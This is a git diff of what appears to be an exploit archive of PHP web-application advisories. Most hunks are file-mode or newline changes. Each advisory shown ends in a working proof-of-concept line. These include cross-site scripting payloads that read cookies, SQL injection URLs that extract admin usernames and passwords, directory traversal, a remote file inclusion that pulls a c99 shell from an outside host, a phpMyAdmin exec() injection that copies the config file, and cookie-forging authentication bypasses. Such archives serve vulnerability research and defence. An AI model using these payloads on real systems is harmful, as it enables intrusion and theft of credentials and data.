http://www.example.com/showmail.php?Folder=Spam';document.location='\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0077\u0069\u0074\u0068\u0028\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u0029\u0061\u006C\u0065\u0072\u0074\u0028\u0063\u006F\u006F\u006B\u0069\u0065\u0029';foo=' http://www.example.com/abook.php?func=view&abookview=global"><img/src/onerror="alert(document.cookie)&email=138195 http://www.example.com/showmail.php?Folder=Inbox&sort=EmailSubject&order=desc&start="><iframe/src="javascript:alert(document.cookie) \ No newline at end of file diff --git a/platforms/php/webapps/32318.txt b/platforms/php/webapps/32318.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32319.txt b/platforms/php/webapps/32319.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3232.txt b/platforms/php/webapps/3232.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32320.txt b/platforms/php/webapps/32320.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32321.txt b/platforms/php/webapps/32321.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32322.txt b/platforms/php/webapps/32322.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32323.txt b/platforms/php/webapps/32323.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32324.txt b/platforms/php/webapps/32324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32325.txt b/platforms/php/webapps/32325.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32326.txt b/platforms/php/webapps/32326.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32327.txt b/platforms/php/webapps/32327.txt old mode 100755 new mode 100644 index 225afc86e..f990ccc9f --- a/platforms/php/webapps/32327.txt +++ b/platforms/php/webapps/32327.txt @@ -4,4 +4,4 @@ XRMS CRM is prone to multiple input-validation vulnerabilities, including an uns Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/xrms/reports/custom/mileage.php?starting="><script>alert(1);</script> \ No newline at end of file +http://www.example.com/xrms/reports/custom/mileage.php?starting="><script>alert(1);</script> \ No newline at end of file diff --git a/platforms/php/webapps/32330.txt b/platforms/php/webapps/32330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32331.txt b/platforms/php/webapps/32331.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32334.txt b/platforms/php/webapps/32334.txt old mode 100755 new mode 100644 index 016302bfd..d3cbfd73e --- a/platforms/php/webapps/32334.txt +++ b/platforms/php/webapps/32334.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Celerondude Uploader 6.1 is vulnerable; other versions may also be affected. -In the login page , username field enter : "><script>alert(1);</script>" \ No newline at end of file +In the login page , username field enter : "><script>alert(1);</script>" \ No newline at end of file diff --git a/platforms/php/webapps/32337.txt b/platforms/php/webapps/32337.txt old mode 100755 new mode 100644 index 0a6fca79b..db7c641f1 --- a/platforms/php/webapps/32337.txt +++ b/platforms/php/webapps/32337.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Silentum LoginSys 1.0.0 is vulnerable; other versions may also be affected. -http://www.example.com/login.php?message=[XSS] \ No newline at end of file +http://www.example.com/login.php?message=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32338.txt b/platforms/php/webapps/32338.txt old mode 100755 new mode 100644 index 0659e4ca0..3535d47af --- a/platforms/php/webapps/32338.txt +++ b/platforms/php/webapps/32338.txt @@ -4,4 +4,4 @@ phpAdultSite is prone to a cross-site scripting vulnerability because it fails t An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -index.php?&results_per_page=50"><script type="text/javascript">alert(/XSS vuln by DavidSopas.com/)</script> \ No newline at end of file +index.php?&results_per_page=50"><script type="text/javascript">alert(/XSS vuln by DavidSopas.com/)</script> \ No newline at end of file diff --git a/platforms/php/webapps/3234.txt b/platforms/php/webapps/3234.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32340.txt b/platforms/php/webapps/32340.txt old mode 100755 new mode 100644 index dda7b2663..bf6194dcd --- a/platforms/php/webapps/32340.txt +++ b/platforms/php/webapps/32340.txt @@ -9,4 +9,4 @@ Gallery 2.0 is vulnerable; other versions may also be affected. http://www.example.com/path/search.php?title=[XSS] http://www.example.com/path/search.php?description=[XSS] http://www.example.com/path/search.php?author=[XSS] -http://www.example.com/path/login.php?return=[XSS] \ No newline at end of file +http://www.example.com/path/login.php?return=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32342.txt b/platforms/php/webapps/32342.txt old mode 100755 new mode 100644 index 9b632ae45..ae38662bf --- a/platforms/php/webapps/32342.txt +++ b/platforms/php/webapps/32342.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Thyme 1.3 is affected; other versions may also be vulnerable. Submit the following to the input field at /thyme/modules/groups/pick_users.php: -' union all select proof,of,concept from mysql.db/* \ No newline at end of file +' union all select proof,of,concept from mysql.db/* \ No newline at end of file diff --git a/platforms/php/webapps/32346.txt b/platforms/php/webapps/32346.txt old mode 100755 new mode 100644 index 489482de8..3741832ee --- a/platforms/php/webapps/32346.txt +++ b/platforms/php/webapps/32346.txt @@ -4,4 +4,4 @@ E-Php B2B Trading Marketplace Script is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/listings.php?browse=product&cid=-1+union+all+select+1,concat(version(),char(58),database(),char(58),user()),3,4,5,6,7,8-- \ No newline at end of file +http://www.example.com/listings.php?browse=product&cid=-1+union+all+select+1,concat(version(),char(58),database(),char(58),user()),3,4,5,6,7,8-- \ No newline at end of file diff --git a/platforms/php/webapps/32347.txt b/platforms/php/webapps/32347.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3235.txt b/platforms/php/webapps/3235.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32351.txt b/platforms/php/webapps/32351.txt old mode 100755 new mode 100644 index 994ff5293..02271dd74 --- a/platforms/php/webapps/32351.txt +++ b/platforms/php/webapps/32351.txt @@ -7,4 +7,4 @@ An attacker can exploit these vulnerabilities using directory-traversal strings Jaw Portal 1.2 is vulnerable; other versions may also be affected. http://www.example.com/index.php?flag=../../../autoexec.bat%00 -http://www.example.com/index.php?inc=../../../autoexec.bat%00 \ No newline at end of file +http://www.example.com/index.php?inc=../../../autoexec.bat%00 \ No newline at end of file diff --git a/platforms/php/webapps/32352.txt b/platforms/php/webapps/32352.txt old mode 100755 new mode 100644 index 9a53298dc..7861514c7 --- a/platforms/php/webapps/32352.txt +++ b/platforms/php/webapps/32352.txt @@ -4,4 +4,4 @@ AvailScript Job Portal Script is prone to an SQL-injection vulnerability because Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/job_seeker/applynow.php?jid=-99999+union+select+0,01,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+admin-- \ No newline at end of file +http://www.example.com/job_seeker/applynow.php?jid=-99999+union+select+0,01,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+admin-- \ No newline at end of file diff --git a/platforms/php/webapps/32353.txt b/platforms/php/webapps/32353.txt old mode 100755 new mode 100644 index 8592658db..c478855ef --- a/platforms/php/webapps/32353.txt +++ b/platforms/php/webapps/32353.txt @@ -8,4 +8,4 @@ This issue affects versions prior to Horde Framework 3.1.9 and 3.2.2. Note that additional products that use the Horde Framework may also be vulnerable. -<body/onload=alert(/hello/)> \ No newline at end of file +<body/onload=alert(/hello/)> \ No newline at end of file diff --git a/platforms/php/webapps/32354.txt b/platforms/php/webapps/32354.txt old mode 100755 new mode 100644 index e47fb5d6a..91f3a1f58 --- a/platforms/php/webapps/32354.txt +++ b/platforms/php/webapps/32354.txt @@ -8,4 +8,4 @@ This issue affects Horde Framework 3.2 through 3.2.1. Note that additional products that use the Horde Framework may also be vulnerable. -<body/onload=alert(/hello/)> \ No newline at end of file +<body/onload=alert(/hello/)> \ No newline at end of file diff --git a/platforms/php/webapps/32355.txt b/platforms/php/webapps/32355.txt old mode 100755 new mode 100644 index 9c2092ce0..25cd7c559 --- a/platforms/php/webapps/32355.txt +++ b/platforms/php/webapps/32355.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Hot Links SQL-PHP 3 and prior versions are vulnerable. -http://www.example.com/news.php?id=-1+union+all+select+1,concat(version(),0x3a,database(),0x3a,user()),null,null-- \ No newline at end of file +http://www.example.com/news.php?id=-1+union+all+select+1,concat(version(),0x3a,database(),0x3a,user()),null,null-- \ No newline at end of file diff --git a/platforms/php/webapps/3236.txt b/platforms/php/webapps/3236.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32360.txt b/platforms/php/webapps/32360.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32361.txt b/platforms/php/webapps/32361.txt old mode 100755 new mode 100644 index 86b4decbb..9221eaedc --- a/platforms/php/webapps/32361.txt +++ b/platforms/php/webapps/32361.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br NooMS 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/search.php?q="<script>alert('xss')</script> \ No newline at end of file +http://www.example.com/search.php?q="<script>alert('xss')</script> \ No newline at end of file diff --git a/platforms/php/webapps/32364.txt b/platforms/php/webapps/32364.txt old mode 100755 new mode 100644 index 5e6c2a228..7c414dc20 --- a/platforms/php/webapps/32364.txt +++ b/platforms/php/webapps/32364.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Dynamic MP3 Lister 2.0.1 is vulnerable; other versions may also be affected. http://www.example.com/index.php?currentpath=[XSS]&sort=[XSS]&invert=[XSS] -http://www.example.com/index.php?sort=[XSS]&invert=[XSS]&currentpath=[XSS]&search=[XSS] \ No newline at end of file +http://www.example.com/index.php?sort=[XSS]&invert=[XSS]&currentpath=[XSS]&search=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32365.txt b/platforms/php/webapps/32365.txt old mode 100755 new mode 100644 index 16907f03c..0b6e87247 --- a/platforms/php/webapps/32365.txt +++ b/platforms/php/webapps/32365.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Paranews 3.4 is vulnerable; other versions may also be affected. -http://www.example.com/news.php?pn_go=details&page=[XSS]&id=[XSS] \ No newline at end of file +http://www.example.com/news.php?pn_go=details&page=[XSS]&id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32366.txt b/platforms/php/webapps/32366.txt old mode 100755 new mode 100644 index 3bbfae16c..0874ab746 --- a/platforms/php/webapps/32366.txt +++ b/platforms/php/webapps/32366.txt @@ -4,4 +4,4 @@ QuicO is prone to an SQL-injection vulnerability because it fails to sufficientl Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/gallery/photo.php?id=48+and+1=2+union+select+1,version(),user(),database(),0x6461726b633064652052756c65732e2e2121,6-- \ No newline at end of file +http://www.example.com/gallery/photo.php?id=48+and+1=2+union+select+1,version(),user(),database(),0x6461726b633064652052756c65732e2e2121,6-- \ No newline at end of file diff --git a/platforms/php/webapps/3237.txt b/platforms/php/webapps/3237.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32375.txt b/platforms/php/webapps/32375.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3238.txt b/platforms/php/webapps/3238.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32383.txt b/platforms/php/webapps/32383.txt old mode 100755 new mode 100644 index f9b1dcb0c..b65971ba8 --- a/platforms/php/webapps/32383.txt +++ b/platforms/php/webapps/32383.txt @@ -6,4 +6,4 @@ Successful attacks can compromise the affected application and possibly the unde This issue affects versions prior to phpMyAdmin 2.11.9.1. -http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token] \ No newline at end of file +http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token] \ No newline at end of file diff --git a/platforms/php/webapps/32387.txt b/platforms/php/webapps/32387.txt old mode 100755 new mode 100644 index 9cd9cd941..180d6b416 --- a/platforms/php/webapps/32387.txt +++ b/platforms/php/webapps/32387.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Quick.Cms.Lite 2.1 is vulnerable; other versions may also be affected. -http://www.example.com/admin.php?"><script>alert(document.cookie)</script><" \ No newline at end of file +http://www.example.com/admin.php?"><script>alert(document.cookie)</script><" \ No newline at end of file diff --git a/platforms/php/webapps/32388.txt b/platforms/php/webapps/32388.txt old mode 100755 new mode 100644 index 538c0eab2..b79167a30 --- a/platforms/php/webapps/32388.txt +++ b/platforms/php/webapps/32388.txt @@ -4,4 +4,4 @@ The Cars & Vehicle script is prone to an SQL-injection vulnerability because it Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -www.example.com/Script/page.php?lnkid=-1/**/UNION/**/SELECT/**/1,1,1,1,concat_ws(user(),version(),database()),1/* \ No newline at end of file +www.example.com/Script/page.php?lnkid=-1/**/UNION/**/SELECT/**/1,1,1,1,concat_ws(user(),version(),database()),1/* \ No newline at end of file diff --git a/platforms/php/webapps/32389.txt b/platforms/php/webapps/32389.txt old mode 100755 new mode 100644 index e8f1940f6..e49f14533 --- a/platforms/php/webapps/32389.txt +++ b/platforms/php/webapps/32389.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Quick.Cart 3.1 is vulnerable; other versions may also be affected. -http://www.example.com/admin.php?"><script>alert(document.cookie)</script><" \ No newline at end of file +http://www.example.com/admin.php?"><script>alert(document.cookie)</script><" \ No newline at end of file diff --git a/platforms/php/webapps/3239.htm b/platforms/php/webapps/3239.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32395.txt b/platforms/php/webapps/32395.txt old mode 100755 new mode 100644 index c4cc54c8e..ecd20c26b --- a/platforms/php/webapps/32395.txt +++ b/platforms/php/webapps/32395.txt @@ -6,4 +6,4 @@ Successful exploits of this issue may allow an attacker to obtain sensitive info HyperStop WebHost Directory 1.2 is vulnerable; other versions may also be affected. -http://www.example.com/admin/backup/db \ No newline at end of file +http://www.example.com/admin/backup/db \ No newline at end of file diff --git a/platforms/php/webapps/32396.txt b/platforms/php/webapps/32396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32397.txt b/platforms/php/webapps/32397.txt old mode 100755 new mode 100644 index 3640f9943..5371679e7 --- a/platforms/php/webapps/32397.txt +++ b/platforms/php/webapps/32397.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a PHP Pro Bid 6.04 is vulnerable; other versions may also be affected. -http://www.example.com/phpprobidlocation/categories.php?start=0&limit=20&parent_id=669&keywords_cat_search=&buyout_price=&reserve_price=&quantity=&enable_swap=&order_field=(select%201)x&order_type=%20 \ No newline at end of file +http://www.example.com/phpprobidlocation/categories.php?start=0&limit=20&parent_id=669&keywords_cat_search=&buyout_price=&reserve_price=&quantity=&enable_swap=&order_field=(select%201)x&order_type=%20 \ No newline at end of file diff --git a/platforms/php/webapps/32398.txt b/platforms/php/webapps/32398.txt old mode 100755 new mode 100644 index bf7de558d..f937e70b5 --- a/platforms/php/webapps/32398.txt +++ b/platforms/php/webapps/32398.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects Thyme 1.3; other versions may also be affected. -http://www.example.com/thyme/modules/common_files/add_calendars.php?callback="/></SCRIPT></FORM><SCRIPT>alert(document.cookie)</SCRIPT><SCRIPT><FORM> \ No newline at end of file +http://www.example.com/thyme/modules/common_files/add_calendars.php?callback="/></SCRIPT></FORM><SCRIPT>alert(document.cookie)</SCRIPT><SCRIPT><FORM> \ No newline at end of file diff --git a/platforms/php/webapps/3240.txt b/platforms/php/webapps/3240.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32402.txt b/platforms/php/webapps/32402.txt old mode 100755 new mode 100644 index 2d6b5c45b..0fee17147 --- a/platforms/php/webapps/32402.txt +++ b/platforms/php/webapps/32402.txt @@ -4,4 +4,4 @@ UNAK-CMS is prone to an authentication-bypass vulnerability because it fails to An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible. -javascript:document.cookie = "unak_lang=1; path=/"; \ No newline at end of file +javascript:document.cookie = "unak_lang=1; path=/"; \ No newline at end of file diff --git a/platforms/php/webapps/32403.txt b/platforms/php/webapps/32403.txt old mode 100755 new mode 100644 index 1b2b1e2fd..08f5a2223 --- a/platforms/php/webapps/32403.txt +++ b/platforms/php/webapps/32403.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc MapCal 0.1 is vulnerable; other versions may also be affected. -http://www.example.com/cms/index.php?action=editevent&id=-0x90+union+select+0x90,0x90,0x90,concat(0x3a,database(),0x3a,version()),0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90+from+events \ No newline at end of file +http://www.example.com/cms/index.php?action=editevent&id=-0x90+union+select+0x90,0x90,0x90,concat(0x3a,database(),0x3a,version()),0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90+from+events \ No newline at end of file diff --git a/platforms/php/webapps/32404.html b/platforms/php/webapps/32404.html old mode 100755 new mode 100644 index a6207901d..db6742484 --- a/platforms/php/webapps/32404.html +++ b/platforms/php/webapps/32404.html @@ -6,4 +6,4 @@ Exploiting this vulnerability may allow an attacker to perform cross-site script Versions prior to fuzzylime (cms) 3.03 are vulnerable. -<form method="post" action="http://www.example.com/fuzzylime/admin/usercheck.php"> <input type="hidden" name="log" value="in"> <input type="text" name="user"value='"><script>alert(1)</script>'> <input type=submit></form> \ No newline at end of file +<form method="post" action="http://www.example.com/fuzzylime/admin/usercheck.php"> <input type="hidden" name="log" value="in"> <input type="text" name="user"value='"><script>alert(1)</script>'> <input type=submit></form> \ No newline at end of file diff --git a/platforms/php/webapps/32405.txt b/platforms/php/webapps/32405.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32406.txt b/platforms/php/webapps/32406.txt old mode 100755 new mode 100644 index e7f81ecc9..64992d7fb --- a/platforms/php/webapps/32406.txt +++ b/platforms/php/webapps/32406.txt @@ -6,4 +6,4 @@ An attacker can leverage the session-fixation issue to hijack a session of an un xt:Commerce 3.04 is vulnerable; other versions may also be affected. -https://www.example.com/xtcommerce304/shopping_cart.php/XTCsid/15031988 \ No newline at end of file +https://www.example.com/xtcommerce304/shopping_cart.php/XTCsid/15031988 \ No newline at end of file diff --git a/platforms/php/webapps/32407.txt b/platforms/php/webapps/32407.txt old mode 100755 new mode 100644 index 916ce4e58..496a84b17 --- a/platforms/php/webapps/32407.txt +++ b/platforms/php/webapps/32407.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to hijack a user's session and gain unauthorize BLUEPAGE CMS 2.5 is vulnerable; other versions may also be affected. -http://www.example.com/BluePageCMS/?PHPSESSID=15031988 \ No newline at end of file +http://www.example.com/BluePageCMS/?PHPSESSID=15031988 \ No newline at end of file diff --git a/platforms/php/webapps/32408.txt b/platforms/php/webapps/32408.txt old mode 100755 new mode 100644 index c608547ed..0b929a326 --- a/platforms/php/webapps/32408.txt +++ b/platforms/php/webapps/32408.txt @@ -4,4 +4,4 @@ BlueCUBE CMS is prone to an SQL-injection vulnerability because it fails to suff Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/tienda.php?id=-1+union+select+concat(version(),0x3a,database(),0x3a,user())/* \ No newline at end of file +http://www.example.com/tienda.php?id=-1+union+select+concat(version(),0x3a,database(),0x3a,user())/* \ No newline at end of file diff --git a/platforms/php/webapps/32409.txt b/platforms/php/webapps/32409.txt old mode 100755 new mode 100644 index 477909aa3..8227f43ec --- a/platforms/php/webapps/32409.txt +++ b/platforms/php/webapps/32409.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects Achievo 1.3.2; other versions may also be affected. -http://www.example.com/achievo-1.3.2/dispatch.php?atknodetype= >"><script%20%0a%0d>a lert(document.cookie)%3B</script>&atkaction=adminpim&atklevel=-1&atkprevlevel =0&achievo=cgvuu4c9nv45ofdq8ntv1inm82 \ No newline at end of file +http://www.example.com/achievo-1.3.2/dispatch.php?atknodetype= >"><script%20%0a%0d>a lert(document.cookie)%3B</script>&atkaction=adminpim&atklevel=-1&atkprevlevel =0&achievo=cgvuu4c9nv45ofdq8ntv1inm82 \ No newline at end of file diff --git a/platforms/php/webapps/32410.txt b/platforms/php/webapps/32410.txt old mode 100755 new mode 100644 index 03f0295e1..9c92a5ca9 --- a/platforms/php/webapps/32410.txt +++ b/platforms/php/webapps/32410.txt @@ -4,4 +4,4 @@ source: http://www.securityfocus.com/bid/31329/info Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors-- \ No newline at end of file +http://www.example.com/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors-- \ No newline at end of file diff --git a/platforms/php/webapps/32411.txt b/platforms/php/webapps/32411.txt old mode 100755 new mode 100644 index fb6d76a41..2993b4b0f --- a/platforms/php/webapps/32411.txt +++ b/platforms/php/webapps/32411.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Datalife Engine CMS 7.2 is vulnerable; other versions may also be affected. -http://www.example.com/admin.php/%3E%22%3E%3CScRiPt%3Ealert('Hadi-Kiamarsi')%3C/ScRiPt%3E \ No newline at end of file +http://www.example.com/admin.php/%3E%22%3E%3CScRiPt%3Ealert('Hadi-Kiamarsi')%3C/ScRiPt%3E \ No newline at end of file diff --git a/platforms/php/webapps/32413.txt b/platforms/php/webapps/32413.txt old mode 100755 new mode 100644 index 8844ba9fe..97a5ea819 --- a/platforms/php/webapps/32413.txt +++ b/platforms/php/webapps/32413.txt @@ -4,4 +4,4 @@ InterTech Web Content Management System (WCMS) is prone to an SQL-injection vuln Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/etemplate.php?id=-5+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users-- \ No newline at end of file +http://www.example.com/etemplate.php?id=-5+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users-- \ No newline at end of file diff --git a/platforms/php/webapps/32415.txt b/platforms/php/webapps/32415.txt old mode 100755 new mode 100644 index f064b312a..4c7641aaa --- a/platforms/php/webapps/32415.txt +++ b/platforms/php/webapps/32415.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a These issues affect versions prior to Ajax Checklist 5.x-1.1. http://www.example.com/ajaxchecklist/save/1/2%27,2),(3,3,(select%20pass%20f -rom%20users%20where%20uid=1),3),(4,4,%274/3/4 \ No newline at end of file +rom%20users%20where%20uid=1),3),(4,4,%274/3/4 \ No newline at end of file diff --git a/platforms/php/webapps/32418.txt b/platforms/php/webapps/32418.txt old mode 100755 new mode 100644 index 2774be216..ccaf99feb --- a/platforms/php/webapps/32418.txt +++ b/platforms/php/webapps/32418.txt @@ -8,4 +8,4 @@ http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_p http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type&search_ordermethod=asc'SQL INJECTION&page=2&item=5 -http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type'SQL INJECTION&search_ordermethod=asc&page=2&item=5 \ No newline at end of file +http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type'SQL INJECTION&search_ordermethod=asc&page=2&item=5 \ No newline at end of file diff --git a/platforms/php/webapps/3242.txt b/platforms/php/webapps/3242.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32421.html b/platforms/php/webapps/32421.html old mode 100755 new mode 100644 index 02f136a64..abe4c2e92 --- a/platforms/php/webapps/32421.html +++ b/platforms/php/webapps/32421.html @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Versions prior to FlatPress 0.804.1 are vulnerable. -<form method="post" action="http://localhost/flatpress/login.php"> <input type="text" name="user" value='"><script>alert(1)</script>'> <input type=submit></form> <form method="post" action="http://localhost/flatpress/login.php"> <input type="text" name="pass" value='"><script>alert(1)</script>'> <input type=submit></form> <form method="post" action="http://localhost/flatpress/contact.php"> <input type="text" name="name" value='"><script>alert(1)</script>'> <input type=submit></form> \ No newline at end of file +<form method="post" action="http://localhost/flatpress/login.php"> <input type="text" name="user" value='"><script>alert(1)</script>'> <input type=submit></form> <form method="post" action="http://localhost/flatpress/login.php"> <input type="text" name="pass" value='"><script>alert(1)</script>'> <input type=submit></form> <form method="post" action="http://localhost/flatpress/contact.php"> <input type="text" name="name" value='"><script>alert(1)</script>'> <input type=submit></form> \ No newline at end of file diff --git a/platforms/php/webapps/32422.txt b/platforms/php/webapps/32422.txt old mode 100755 new mode 100644 index f5b1aa5c3..d3b20bd8a --- a/platforms/php/webapps/32422.txt +++ b/platforms/php/webapps/32422.txt @@ -10,4 +10,4 @@ The following example account registration data is available: Username: [username][whitespace characters]NULL Password: [password] -E-Mail: [E-Mail] \ No newline at end of file +E-Mail: [E-Mail] \ No newline at end of file diff --git a/platforms/php/webapps/32427.txt b/platforms/php/webapps/32427.txt old mode 100755 new mode 100644 index 6407c270d..c2b9f88ab --- a/platforms/php/webapps/32427.txt +++ b/platforms/php/webapps/32427.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to include an arbitrary remote file containin Barcode Generator 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http://example2.com/shell/c99.txt? \ No newline at end of file +http://www.example.com/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http://example2.com/shell/c99.txt? \ No newline at end of file diff --git a/platforms/php/webapps/3243.txt b/platforms/php/webapps/3243.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32431.txt b/platforms/php/webapps/32431.txt old mode 100755 new mode 100644 index bde34f0ba..15d0eb830 --- a/platforms/php/webapps/32431.txt +++ b/platforms/php/webapps/32431.txt @@ -4,4 +4,4 @@ Lyrics Script is prone to a cross-site scripting vulnerability because it fails An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/search_results.php?k= XSS_CODE \ No newline at end of file +http://www.example.com/search_results.php?k= XSS_CODE \ No newline at end of file diff --git a/platforms/php/webapps/32432.txt b/platforms/php/webapps/32432.txt old mode 100755 new mode 100644 index 63ca95f60..2b7bae28a --- a/platforms/php/webapps/32432.txt +++ b/platforms/php/webapps/32432.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow The following example is available: http://www.example.com/search.php -in search box code Xss \ No newline at end of file +in search box code Xss \ No newline at end of file diff --git a/platforms/php/webapps/32433.txt b/platforms/php/webapps/32433.txt old mode 100755 new mode 100644 index 3f081d7ac..134d2034a --- a/platforms/php/webapps/32433.txt +++ b/platforms/php/webapps/32433.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br http://www.example.com/stuffs.php?category= XSS_CODE http://www.example.com/search.php -in search box code Xss \ No newline at end of file +in search box code Xss \ No newline at end of file diff --git a/platforms/php/webapps/32434.txt b/platforms/php/webapps/32434.txt old mode 100755 new mode 100644 index c913a470a..77b1a088b --- a/platforms/php/webapps/32434.txt +++ b/platforms/php/webapps/32434.txt @@ -4,4 +4,4 @@ Recipe Script is prone to a cross-site scripting vulnerability because it fails An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/search.php?keyword= XSS_HACKING \ No newline at end of file +http://www.example.com/search.php?keyword= XSS_HACKING \ No newline at end of file diff --git a/platforms/php/webapps/32437.txt b/platforms/php/webapps/32437.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32441.txt b/platforms/php/webapps/32441.txt old mode 100755 new mode 100644 index 85a35784a..e4ceece38 --- a/platforms/php/webapps/32441.txt +++ b/platforms/php/webapps/32441.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to gain administrative access to the PHPJabbers Post Comments 3.0 is vulnerable; other versions may also be affected. -javascript:document.cookie = "PostCommentsAdmin=logged; path=/ \ No newline at end of file +javascript:document.cookie = "PostCommentsAdmin=logged; path=/ \ No newline at end of file diff --git 